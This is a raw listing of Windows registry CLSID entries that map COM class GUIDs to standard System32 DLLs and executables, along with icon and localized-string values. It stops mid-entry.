HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BCE6E2B-116B-420F-928B-5356D1629979}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\recovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BF8D948-5C56-450e-BAF8-D6144C6E81CB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C07355E-C50A-45D2-B4A3-0A8235F8047F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9c15e692-86da-4ab8-8b5e-6ac79deb6f20}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C33C4AB-BC91-4A79-BF47-7C90CEBC3AA3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C38ED61-D565-4728-AEEE-C80952F0ECDE}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vdsldr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C49FB9B-4E8C-43AE-BACF-76404B422264}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DscTimer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C4D3346-650D-472d-A867-6F595B39D973}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\AuditPolicyGPInterop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C60DE1E-E5FC-40f4-A487-460851A8D915} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\autoplay.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\autoplay.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C60DE1E-E5FC-40f4-A487-460851A8D915}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\autoplay.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C60DE1E-E5FC-40f4-A487-460851A8D915}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C60DE1E-E5FC-40f4-A487-460851A8D915}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\autoplay.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C62D90D-9C14-400a-942A-404ABA5E1F38}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C695035-48D2-4229-8B73-4C70E756E519}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usosvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-3001#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll,-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9cb233a5-a4a5-46b9-ab13-db07ce949410}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\raschapext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9CB5172B-D600-46BA-AB77-77BB7E3A00D9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9CC1CC97-48C6-43DB-8265-4BD9C8E192DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9cca66bb-9c78-4e59-a76f-a5e9990b8aa0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9CDAEA40-A7D3-4cc5-AED0-B5E35AD0F169}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9cfc2df3-6ba3-46ef-a836-e519e81f0ec4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9cfc6d75-e648-47a8-9ea0-fb0907558952}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcuiu.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D27B916-4F17-4EE8-A71C-D84222993D64}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CellularAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D3C0751-A13F-46a6-B833-B46A43C30FE8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D5F55E3-B423-492F-AC3B-B7F6CBC563B9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\eUICCsCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D71A98F-1E45-42EC-AF3D-FA13BEFB955C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D7F0E95-8848-47B3-8D0E-E6C0E396E640}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9D99BE80-B271-4524-BA35-30414FE18F0E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\PrintWSDAHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DA3DFB6-DB99-4A52-B52B-058E0C6B7956}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MSWB7.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wscinterop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DB7A13C-F208-4981-8353-73CC61AE2783} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\twext.dll,-1024 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DB7A13C-F208-4981-8353-73CC61AE2783}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DB7A13C-F208-4981-8353-73CC61AE2783}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DBD2C50-62AD-11d0-B806-00C04FD706EC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DC486E3-B0E8-4230-81C4-A84D019E2B98}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_extensions.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DD35758-AAF5-4894-ADAA-77A492F54E0A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlandlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\timedate.cpl,-51 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\timedate.cpl,-50 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B69-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B6C-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B6E-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B70-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B74-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B76-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssph.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B7F-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B8A-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B8B-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B8D-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B8E-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B90-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175B98-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175BA8-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175BA9-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175BB7-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E175BB8-F52A-11D8-B9A5-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E51E0D0-6E0F-11d2-9601-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\sendmail.dll,-26 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\sendmail.dll,-2001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sendmail.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\sendmail.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sendmail.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9e752621-4573-4308-81c6-9f210db29e85}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9EBB177D-0161-4e2c-81B0-E15D586CFC9F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\recovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9EC4B4F9-3029-45ad-947B-344DE2A249E2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ecb380c-2333-4c68-9691-a569fe446820}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fixmapi.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ecf51f8-cfb1-458d-9485-f5a231afd22f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ECF752A-518E-46b1-8691-F5090F5E9A14}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9EE72A18-7BD4-44E1-8BA9-1E8E60D8CCA3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WdacWmiProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9EF96870-E160-4792-820D-48CF0649E4EC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9F36C194-166C-4cbf-B7EA-BF039F950172}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9F377D7E-E551-44f8-9F94-9DB392B03B7B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9f37f39c-6f49-11d1-8c18-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9F4F643B-8806-4861-8A79-6699E94DCF66}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9F66347C-60C4-4C4D-AB58-D2358685F607}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9F7D7BB5-20B3-11DA-81A5-0030F1642E3C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SmiEngine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9fb45d27-dfe3-4383-b117-ab631787649a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.ui.picturepassword.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dataexchange.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FE63AFD-59CF-4419-9775-ABCC3849F861} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\recovery.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\recovery.dll,-101#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FE63AFD-59CF-4419-9775-ABCC3849F861}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1022 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FE63AFD-59CF-4419-9775-ABCC3849F861}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FE63AFD-59CF-4419-9775-ABCC3849F861}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\recovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FF65B15-F7B4-4858-BFE6-DB2083DEDF68}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ff7242c-364d-425d-95ce-c64f8ee140d1}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a00ee528-ebd9-48b8-944a-8942113d46ac}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a00ee528-ebd9-48b8-944a-8942113d46ac}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a015411a-f97d-4ef3-8425-8a38d022aebc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0202464-B4B4-4b85-9628-CCD46DF16942}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A02797fC-C4AE-418C-AF95-E637C7EAD2A1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A05AD39D-C5E6-4723-8802-AB7788548580}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a07034fd-6caa-4954-ac3f-97a27216f98a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0953C92-50DC-43bf-BE83-3742FED03C9C} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12690 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0953C92-50DC-43bf-BE83-3742FED03C9C}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-189 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0953C92-50DC-43bf-BE83-3742FED03C9C}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A09CCA86-27BA-4F39-9053-121FA4DC08FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0A8C450-92FC-422a-AA04-0A19E8D65AC7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0ADD4EC-5BD3-4f70-A47B-07797A45C635} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\cscui.dll,-45 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0ADD4EC-5BD3-4f70-A47B-07797A45C635}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\cscui.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0ADD4EC-5BD3-4f70-A47B-07797A45C635}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0C63C30-F08D-4AB4-907C-34905D770C7D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a0d018ee-1100-4389-ab44-464faf001288}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A0F93E27-F05D-4153-A151-F3720369A4C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\signdrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a10dfc9e-ff12-4e7f-bc74-8fe9053920f0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSyncProviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1170F2C-C5A4-467F-8EB3-50571D7201AE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a11850eb-4501-4dea-9ef5-1d37f57d247d}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A11DB3DC-5FF6-4a0b-AEE6-29BCAC1E11E0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndfetw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1230201-1439-4E62-A414-190D0AC3D40E}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1230401-67a5-4df6-a730-dce8822c80c4}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A12E5BCB-9758-4FBE-9B85-F50C822E6B5E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\EnterpriseAppMgmtClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A139E32E-EA10-4B93-A813-A9E44ADA2938}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a16e1bff-a80d-48ad-aecd-a35c005685fe}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A19141CE-D197-4C8B-82C9-4995F5303497}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DisplaySwitch.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a1b4dd9f-c1d9-4e24-9b7f-c0ef7cffdb71}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MitigationClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1B9E04A-3226-11D2-883E-00104B2AFB46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\servdeps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1EBDBD0-E4BA-4DB3-8DF6-C91534061EF4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A1FC5C0F-6A66-4858-8BA5-1E467D09695D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A22C4FC7-6E91-4e1d-89E9-53B2667B72BA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A25821B5-F310-41BD-806F-5864CC441B78} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\wlanpref.dll,-5200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A25821B5-F310-41BD-806F-5864CC441B78}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\wlanpref.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A25821B5-F310-41BD-806F-5864CC441B78}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A258718D-BE3E-40CC-A77F-75642516497C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A26CEC36-234C-4950-AE16-E34AACE71D0D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wmphoto.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a2c6a94b-127a-4173-a498-8204322fa2b8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fwmdmcsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A2CE91DB-204B-4A63-842B-3EF93694DFF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\EnterpriseAPNCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A2DC4FCB-C32A-4E4E-A2DB-67A008913992}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A2E6DDA0-06EF-4df3-B7BD-5AA224BB06E8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A31AD6C2-FF4C-43D4-8E90-7101023096F9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\TimeSyncTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a31c0e24-c249-4e36-a1a3-9dfdceda9bbc}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a323554a-0fe1-4e49-aee1-6722465d799f}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A32552C5-BA61-457A-B59A-A2561E125E33}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A33FB695-B731-4A85-AABE-656397D0E88D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A373F500-7A87-11D3-B1C1-00C04F68155C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A37B2DFB-4204-4476-B1D9-29413836093D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a38b883c-1682-497e-97b0-0a3a9e801682}\InProcServer32 (Default) REG_EXPAND_SZ 